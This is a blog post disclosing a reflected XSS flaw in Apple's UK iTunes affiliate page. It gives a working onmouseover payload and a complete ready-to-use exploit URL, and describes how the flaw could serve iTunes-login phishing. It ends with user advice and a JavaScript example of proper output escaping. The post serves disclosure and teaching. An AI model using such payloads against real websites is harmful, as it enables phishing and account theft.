Apple website vulnerable to XSS attacks

Disclaimer: The following description is for educational purposes only. It demonstrates how a modified URL can be used to execute scripts on a website. The purpose is to make users aware of the threat and explain how they can protect themselves against phishing scams. This is not to be seen as a tutorial on how to create a phishing site. Note that Apple, as well as a lot of other companies, monitors the traffic on its website. If you try to do something illegal, you might get into serious trouble!

Here are some screenshots in case Apple fixed the bug in the meantime (and hopefully they will soon):

A week ago, a friend told me there was an exploitable security vulnerability on Apple’s website, which enabled users to tamper with the page by modifying some parameters. The bug on the global site was quickly fixed, but it’s still present on the UK site and other localized versions.

Note that this really is Apple’s UK website (apple.com/uk) and not a replica. This is possible because the artist name, album name and thumbnail URL are passed as GET parameters (this means they are appended to the URL using the following syntax: http://www.foobar.com?param1_name=value1&param2_name=value2) which are poorly sanitized before being written back into the page. This class of vulnerability is called XSS (Cross Site Scripting).

Here’s the complete URL: http://www.apple.com/uk/itunes/affiliates/download/?artistName=your+room+tonight&thumbnailUrl=http://epicanthus.files.wordpress.com/2007/05/ucla_undierun_chicks_crop.jpg&itmsUrl=http://www.hotasianchicks.com&albumName=half+dressed+hot+asian+chicks+to+come

Wow, that was fun, but can’t that be dangerous? Yes, it can!

After some testing and analysis I figured out that the value of the artistName parameter is written into the page without its HTML tags being escaped. I tried injecting a <script> tag but it wouldn’t execute. I was able to use a <div> container with an onmouseover event handler to work around the problem.

Note that you can’t directly append special characters to a URL; you need to URL-encode them first. To do so you can use one of many websites, or write your own encoder using the JavaScript function encodeURIComponent.

I created an invisible <div> container with a higher z-index than any other element on the page (this means it is the foreground layer) and the same width as the website. When the user moves the mouse, the onmouseover event is triggered, executing the JavaScript it includes. You can put virtually anything in there. Thanks to the DOM you can access any element of the site by its ID using the getElementById function. As a proof of concept I replaced the content of an entire <div> container using the innerHTML property.

This is the “value” used for the artistname parameter:

<div style="position:absolute;z-index:31337;width:3000px;height:2000px;margin:0;padding:0;left:0;top:0;overflow:hidden;" onmouseover="javascript:document.getElementById('looking').innerHTML='<p>There could be virtually ANYTHING here e.g. phishing site, malicious JavaScript...</p>';"></div>

After URL-encoding it, it looks like this:

%3Cdiv%20style%3D%22position%3Aabsolute%3Bz-index%3A31337%3Bwidth%3A3000px%3Bheight%3A2000px%3Bmargin%3A0%3Bpadding%3A0%3Bleft%3A0%3Btop%3A0%3Boverflow%3Ahidden%3B%22%20onmouseover%3D%22javascript%3Adocument.getElementById%28%27looking%27%29.innerHTML%3D%27%3Cp%3EThere%20could%20be%20virtually%20ANYTHING%20here%20e.g.%20phishing%20site%2C%20malicious%20JavaScript...%3C%2Fp%3E%27%3B%22%3E%3C%2Fdiv%3E

This is the complete, ready-to-use URL:

http://www.apple.com/uk/itunes/affiliates/download/?artistName=Apple+%3Cdiv%20style%3D%22position%3Aabsolute%3Bz-index%3A31337%3Bwidth%3A3000px%3Bheight%3A2000px%3Bmargin%3A0%3Bpadding%3A0%3Bleft%3A0%3Btop%3A0%3Boverflow%3Ahidden%3B%22%20onmouseover%3D%22javascript%3Adocument.getElementById%28%27looking%27%29.innerHTML%3D%27%3Cp%3EThere%20could%20be%20virtually%20ANYTHING%20here%20e.g.%20phishing%20site%2C%20malicious%20JavaScript...%3C%2Fp%3E%27%3B%22%3E%3C%2Fdiv%3E&thumbnailUrl=&itmsUrl=http://www.google.com&albumName=a+XSS+exploitable+website

Still sounds all techie and boring? Well, in practice this means that a malfeasant person could remodel the whole site, e.g. inviting the user to log in to sign up for the chance to win a MacBook Air. Since the attacker has full control over the site’s content, he can send the login information to his own server to gather iTunes login data, which he could then use to buy music on behalf of the user. This is commonly referred to as phishing.

What makes it dangerous is that it doesn’t only look like Apple’s website, it is Apple’s website. Although the modification is not permanent and requires the user to open the prepared link, it is likely to fool a lot of people!

How can you protect yourself? Never be careless about your user information! Instead of using the link that was sent to you, go to the base page (apple.com) and follow the links to navigate to the page you are looking for. This principle is pretty easy and it doesn’t only apply to Apple’s website but to everyday internet situations.

As a web developer there is one important thing you need to know: NEVER trust user input! This means you need to sanitize all user inputs before using them in your scripts or putting them into your database. In PHP there are a couple of handy functions which do the job for you, such as mysql_real_escape_string and htmlentities; you just need to make sure you use them in the appropriate context (htmlentities when writing a value into an HTML page, mysql_real_escape_string when embedding it in a MySQL query).
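To make the developer advice concrete, here is an added example (not code from the original post or from Apple) of the server side doing the right thing for a page like the affiliate download page above: the GET parameters are decoded from the percent-encoded query string (the mirror image of the encodeURIComponent step described earlier) and every value is escaped for the HTML context it lands in before the page is rendered, which is what htmlentities does in PHP. It goes a little beyond the post by also checking the scheme of the thumbnail URL, since a URL attribute needs a validity check as well as escaping. The page template, the request URL and the parameter handling are assumptions; only the three parameter names come from the post.

```javascript
// Added example: contextual output encoding for the affiliate download page.
// Not the original post's code and not Apple's code; template and request
// URL are constructed for illustration, parameter names follow the post.

// HTML-escape a value for insertion into element content or a quoted
// attribute (the equivalent of PHP's htmlentities with ENT_QUOTES).
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// A value used in a src attribute needs a scheme check in addition to
// escaping; otherwise javascript: or data: URLs pass through untouched.
function safeHttpUrl(value) {
  try {
    const u = new URL(value);
    if (u.protocol === 'http:' || u.protocol === 'https:') return u.href;
  } catch (e) {
    // not an absolute URL at all
  }
  return '';
}

// Read the GET parameters exactly as a browser sends them: the query string
// arrives percent-encoded and URLSearchParams decodes it.
function readParams(requestUrl) {
  const q = new URL(requestUrl).searchParams;
  return {
    artistName: q.get('artistName') || '',
    albumName: q.get('albumName') || '',
    thumbnailUrl: q.get('thumbnailUrl') || '',
  };
}

// Render the page. Each untrusted value goes through the encoder for the
// context it is written into: text node, attribute value or URL attribute.
function renderAffiliatePage(params) {
  const src = safeHttpUrl(params.thumbnailUrl);
  return [
    '<div id="looking">',
    src ? `  <img src="${escapeHtml(src)}" alt="">` : '',
    `  <h1>${escapeHtml(params.artistName)}</h1>`,
    `  <h2>${escapeHtml(params.albumName)}</h2>`,
    '</div>',
  ].join('\n');
}

// Constructed sample request with the same injection shape as in the post:
// a <div> carrying an onmouseover handler inside artistName, plus a
// javascript: URL in thumbnailUrl.
const SAMPLE_REQUEST =
  'http://example.invalid/uk/itunes/affiliates/download/?artistName=' +
  encodeURIComponent('Apple <div style="position:absolute" onmouseover="alert(1)"></div>') +
  '&albumName=' + encodeURIComponent('a XSS exploitable website') +
  '&thumbnailUrl=' + encodeURIComponent('javascript:alert(1)');

if (typeof require !== 'undefined' && require.main === module) {
  // The injected markup comes out as inert text, and the javascript: URL is dropped.
  console.log(renderAffiliatePage(readParams(SAMPLE_REQUEST)));
}
```

Run it with node and compare the output with the payload in the post: the `<div` becomes `&lt;div`, the quotes around the onmouseover handler become `&quot;`, so the browser shows the text instead of attaching an event handler, and the thumbnail is omitted because its scheme is not http or https. The point of the three separate helpers is that escaping is context-dependent: htmlentities alone would not have stopped a javascript: URL in a src attribute.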
